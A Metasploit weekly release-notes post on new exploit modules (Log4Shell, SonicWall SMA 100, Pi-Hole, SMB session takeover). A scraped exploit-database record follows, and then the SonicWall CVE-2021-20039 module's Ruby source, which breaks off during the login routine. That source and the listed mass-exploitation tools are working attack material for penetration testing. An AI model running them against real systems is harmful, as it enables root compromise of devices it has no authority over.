## Log4Shell goodness
Log4Shell made an unfortunate end to 2021 for many organizations, but it also makes for some great additions to Metasploit Framework. Contributors [sempervictus](<https://github.com/sempervictus>), [schierlm](<https://github.com/schierlm>), [righel](<https://github.com/righel>), [timwr](<https://github.com/timwr>) and our very own [Spencer McIntyre](<https://github.com/smcintyre-r7>) have collaborated to bring us a Log4Shell module that uses header stuffing to exploit vulnerable HTTP servers, resulting in Remote Code Execution.
## SonicWall SSL VPN module for Rapid7-discovered vulnerability
Rapid7 disclosed the technical details of [five vulnerabilities](<https://www.rapid7.com/blog/post/2022/01/11/cve-2021-20038-42-sonicwall-sma-100-multiple-vulnerabilities-fixed-2/>) discovered by [jbaines-r7](<https://blog.rapid7.com/2022/01/14/metasploit-weekly-wrap-up/%E2%80%8B%E2%80%8Bhttps://github.com/jbaines-r7>) affecting SonicWall’s SMA-100 series of SSL VPN devices. The disclosure included landing a Metasploit module that gives remote and authenticated attackers `root` access to the device using CVE-2021-20039.
## Pi-Hole command execution and common exploit library
An exciting new addition has worked its way into Metasploit Framework this week. Contributor [h00die](<https://github.com/h00die>) has created an authenticated RCE module that takes advantage of improper escaping of characters in Pi-Hole’s Top Domains API’s `validDomainWildcard` field. H00die has also created a library that aims to make developing future Pi-Hole modules easier.
## New module content (4)
* [Pi-Hole Top Domains API Authenticated Exec](<https://github.com/rapid7/metasploit-framework/pull/16012>) by SchneiderSec and h00die, which exploits [CVE-2021-32706](<https://attackerkb.com/topics/4c25C9i2U2/cve-2021-32706?referrer=blog>) \- This adds an auxiliary module that executes commands against Pi-Hole versions <= `5.5`. This also introduces a Pi-Hole library for common functionality required in exploits against the service.
* [SonicWall SMA 100 Series Authenticated Command Injection](<https://github.com/rapid7/metasploit-framework/pull/16041>) by jbaines-r7, which exploits [CVE-2021-20039](<https://attackerkb.com/topics/9szJhq46lw/cve-2021-20039?referrer=blog>) \- This adds a module that exploits an authenticated command injection vulnerability in multiple versions of the SonicWALL SMA 100 series web interface. In the SSL certificate deletion functionality, the sanitization logic permits the `\n` character which acts as a terminator when passed to a call to `system()`. An authenticated attacker can execute arbitrary commands as the `root` user.
* [Log4Shell HTTP Header Injection](<https://github.com/rapid7/metasploit-framework/pull/15969>) by sinn3r, juan vazquez, Michael Schierl, RageLtMan, and Spencer McIntyre, which exploits [CVE-2021-44228](<https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228-log4shell?referrer=blog>) \- This adds an exploit for HTTP servers that are affected by the Log4J/Log4Shell vulnerability via header stuffing.
* [Microsoft Windows SMB Direct Session Takeover](<https://github.com/rapid7/metasploit-framework/pull/15903>) by usiegl00 - This adds a new exploit module that implements the Shadow Attack, SMB Direct Session takeover. Before running this module, a MiTM attack needs to be performed to let it intercept SMB authentication requests between a client and a server. by using any kind of ARP spoofer/poisoner tools in addition to Metasploit. If the connecting user is an administrator and network logins are allowed to the target machine, this module will execute an arbitrary payload.
## Enhancements and features
* [#15656](<https://github.com/rapid7/metasploit-framework/pull/15656>) from [HynekPetrak](<https://github.com/HynekPetrak>) \- This enables the `vmware_vcenter_vmdir_auth_bypass` module to create an admin user even if the target is not vulnerable to CVE-2020-3952, assuming we have obtained valid credentials to the vCenter LDAP directory.
* [#16021](<https://github.com/rapid7/metasploit-framework/pull/16021>) from [zeroSteiner](<https://github.com/zeroSteiner>) \- This adds additional tests for Meterpreter's mkdir/rmdir functionality to ensure uniform implementations across all Meterpreters
* [#16024](<https://github.com/rapid7/metasploit-framework/pull/16024>) from [sjanusz-r7](<https://github.com/sjanusz-r7>) \- This adds in a new command to Meterpreter that allows the end user to kill all channels at once
* [#16040](<https://github.com/rapid7/metasploit-framework/pull/16040>) from [jmartin-r7](<https://github.com/jmartin-r7>) \- Removes Ruby 2.5 support as it is officially end of life
* [#12217](<https://github.com/rapid7/metasploit-framework/pull/12217>) from [SkypLabs](<https://github.com/SkypLabs>) \- This adds the f5 load balancer cookie to notes, and cleans up the module (rubocop/documentation/refs)
## Bugs fixed
* [#16016](<https://github.com/rapid7/metasploit-framework/pull/16016>) from [bwatters-r7](<https://github.com/bwatters-r7>) \- This fixes an issue in the `auxiliary/scanner/dcerpc/hidden` module where the `RHOSTS` datastore option was not available, resulting in hosts not being scanned.
* [#16027](<https://github.com/rapid7/metasploit-framework/pull/16027>) from [zeroSteiner](<https://github.com/zeroSteiner>) \- This fixes an issue with tab completion for the `generate` command. Completion now works with both the `-f` and `-o` flags.
* [#16043](<https://github.com/rapid7/metasploit-framework/pull/16043>) from [shoxxdj](<https://github.com/shoxxdj>) \- Fixes crash in the `auxiliary/scanner/http/wordpress_scanner.rb` module when attempting to scan themes
## Get it
As always, you can update to the latest Metasploit Framework with `msfupdate`
and you can get more details on the changes since the last blog post from
GitHub:
* [Pull Requests 6.1.23...6.1.25](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222022-01-06T10%3A44%3A33-06%3A00..2022-01-13T13%3A35%3A39-06%3A00%22>)
* [Full diff 6.1.23...6.1.25](<https://github.com/rapid7/metasploit-framework/compare/6.1.23...6.1.25>)
If you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest.
To install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the
[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).
{"githubexploit": [{"lastseen": "2022-03-23T14:57:26", "description": "# Bad Blood\n\nBad Blood is an exploit for [CVE-2021-20038](https:...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-11T02:25:25", "type": "githubexploit", "title": "Exploit for Out-of-bounds Write in Sonicwall Sma 200 Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-20038", "CVE-2021-20039"], "modified": "2022-02-15T01:59:06", "id": "BCE44917-6A5A-5482-8773-B2FA0DE70F3B", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-06-22T16:37:54", "description": "# CVE-2021-20038-Mass-RCE\nCVE-2021-20038 Mass Exploitation tool ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-24T02:02:54", "type": "githubexploit", "title": "Exploit for Out-of-bounds Write in Sonicwall Sma 200 Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-20038"], "modified": "2022-06-22T13:24:42", "id": "FB7F5C33-B7F8-5801-82DC-974106DCDC17", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-22T23:04:19", "description": "# CVE-2021-20038-Mass-RCE\nCVE-2021-20038 Mass Exploitation tool ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-24T02:02:54", "type": "githubexploit", "title": "Exploit for Out-of-bounds Write in Sonicwall Sma 200 Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-20038"], "modified": "2022-06-22T13:24:42", "id": "836286BB-CB4B-54F2-BC4E-30AB85C613C5", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-26T22:10:36", "description": "# CVE-2021-20038-Mass-RCE\nCVE-2021-20038 Mass Exploitation tool ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-26T04:38:11", "type": "githubexploit", "title": "Exploit for Out-of-bounds Write in Sonicwall Sma 200 Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-20038"], "modified": "2022-04-26T04:42:25", "id": "08357A6D-CD7A-52F0-9697-45B80724C49D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-08T04:59:33", "description": "# SonicWallSSL-VPN_...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-08T03:38:06", "type": "githubexploit", "title": "Exploit for Out-of-bounds Write in Sonicwall Sma 200 Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-20038"], "modified": "2022-08-08T04:56:31", "id": "D20389A4-F885-5B7E-B438-63820C721AD3", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-08T04:59:58", "description": "# SonicWallSSL-VPN_...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-08T03:38:06", "type": "githubexploit", "title": "Exploit for Out-of-bounds Write in Sonicwall Sma 200 Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-20038"], "modified": "2022-08-08T04:56:31", "id": "77916E79-E02E-5614-8FE7-E108D8A8A7E5", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-19T02:10:33", "description": "# log4j-scanner\nLog4j 2 (CVE-2021-44228) vulnerability scanner f...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-13T22:11:15", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-19T01:59:07", "id": "8E1F0596-03B7-5FCC-8A29-3A8B45D02198", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-22T08:49:34", "description": "## Log4J_Exploitation-Vulnerabiliy__CVE-2021-44228.\n\n![Untitled]...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-13T11:29:57", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-08T00:28:45", "id": "7948E878-9BFE-5FEB-90AE-14C32290452F", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-04-01T15:06:25", "description": "# log4j-fuzzer\n## For Single Target \n```bash\nchmod +x log4j\n```\n...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-08T00:28:32", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-04-01T12:41:00", "id": "E9DFB8EA-B99D-5022-ACE6-5A42D0D6A350", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-18T14:08:54", "description": "# Log4Shell sample vulnerable application (CVE-2021-44228)\n\nThis...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-18T12:50:04", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-18T12:50:14", "id": "9E16D977-AA24-57C3-9BD1-98296F3186F5", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-01-18T14:46:06", "description": "# RS4LOGJ-CVE-2021-44228\n## Apache Log4j ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-28T13:32:16", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-28T13:50:33", "id": "4A0D603B-6526-5D1E-BADC-55B4775C354B", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-20T11:08:05", "description": "# Apache Log4j Zero Day aka Log4Shell aka CVE-2021-44228\n\n<!-- v...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-20T10:34:06", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-20T10:34:18", "id": "F4C136DE-892B-5921-8475-E30BD548DDBB", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-03T20:29:44", "description": "CVE-2021-44228-Mass-RCE\n\n\nCVE-2021-44228 Mass Exploitation tool ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-03T17:18:43", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-03T17:18:43", "id": "2B297EB1-A602-5F7B-B21B-C34BC6EB4308", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}], "metasploit": [{"lastseen": "2022-06-24T08:36:34", "description": "This module exploits an authenticated command injection vulnerability in the SonicWall SMA 100 series web interface. Exploitation results in command execution as root. The affected versions are: \\- 10.2.1.2-24sv and below \\- 10.2.0.8-37sv and below \\- 9.0.0.11-31sv and below\n", "cvss3": {}, "published": "2022-01-10T20:43:50", "type": "metasploit", "title": "SonicWall SMA 100 Series Authenticated Command Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-20038", "CVE-2021-20039"], "modified": "2022-01-11T11:17:45", "id": "MSF:EXPLOIT-LINUX-HTTP-SONICWALL_CVE_2021_20039-", "href": "https://www.rapid7.com/db/modules/exploit/linux/http/sonicwall_cve_2021_20039/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'SonicWall SMA 100 Series Authenticated Command Injection',\n 'Description' => %q{\n This module exploits an authenticated command injection vulnerability\n in the SonicWall SMA 100 series web interface. Exploitation results in\n command execution as root. The affected versions are:\n\n - 10.2.1.2-24sv and below\n - 10.2.0.8-37sv and below\n - 9.0.0.11-31sv and below\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'jbaines-r7' # Vulnerability discovery and Metasploit module\n ],\n 'References' => [\n [ 'CVE', '2021-20039' ],\n [ 'URL', 'https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0026'],\n [ 'URL', 'https://www.rapid7.com/blog/post/2022/01/11/cve-2021-20038-42-sonicwall-sma-100-multiple-vulnerabilities-fixed-2'],\n [ 'URL', 'https://attackerkb.com/topics/9szJhq46lw/cve-2021-20039/rapid7-analysis']\n ],\n 'DisclosureDate' => '2021-12-14',\n 'Platform' => ['linux'],\n 'Arch' => [ARCH_X86],\n 'Privileged' => true,\n 'Targets' => [\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86],\n 'Type' => :linux_dropper,\n 'CmdStagerFlavor' => [ 'echo', 'printf' ]\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'RPORT' => 443,\n 'SSL' => true,\n 'PrependFork' => true\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK ]\n }\n )\n )\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/']),\n OptString.new('USERNAME', [true, 'The username to authenticate with', 'admin']),\n OptString.new('PASSWORD', [true, 'The password to authenticate with', 'password']),\n OptString.new('SWDOMAIN', [true, 'The domain to log in to', 'LocalDomain']),\n OptString.new('PORTALNAME', [true, 'The portal to log in to', 'VirtualOffice'])\n ])\n end\n\n ##\n # Extract the version number from a javascript include in the login landing page.\n # And compare the version against known affected. Affected versions are:\n #\n # 10.2.1.2-24sv and below\n # 10.2.0.8-37sv and below\n # 9.0.0.11-31sv and below\n ##\n def check\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, '/cgi-bin/welcome'),\n 'agent' => 'SonicWALL Mobile Connect'\n })\n return CheckCode::Unknown('Failed to retrieve the version information') unless res&.code == 200\n\n version = res.body.match(/\\.([0-9.\\-a-z]+)\\.js\" type=/)\n return CheckCode::Unknown('Failed to retrieve the version information') unless version\n\n version = version[1]\n\n major, minor, revision, build = version.split('.', 4)\n build, point = build.split('-', 2)\n print_status(\"Version found: #{major}.#{minor}.#{revision}.#{build}-#{point}\")\n point.delete_suffix('sv')\n\n case major\n when '9'\n return CheckCode::Safe unless minor.to_i == 0 && revision.to_i == 0 && build.to_i <= 11 && point.to_i <= 31\n when '10'\n return CheckCode::Safe unless minor.to_i == 2\n\n case revision\n when '0'\n return CheckCode::Safe unless build.to_i <= 8 && point.to_i <= 37\n when '1'\n return CheckCode::Safe unless build.to_i <= 2 && point.to_i <= 24\n else\n return CheckCode::Safe\n end\n else\n return CheckCode::Safe\n end\n CheckCode::Appears('Based on the discovered version.')\n end\n\n def login\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/cgi-bin/userLogin'),\n 'agent' => 'SonicWALL 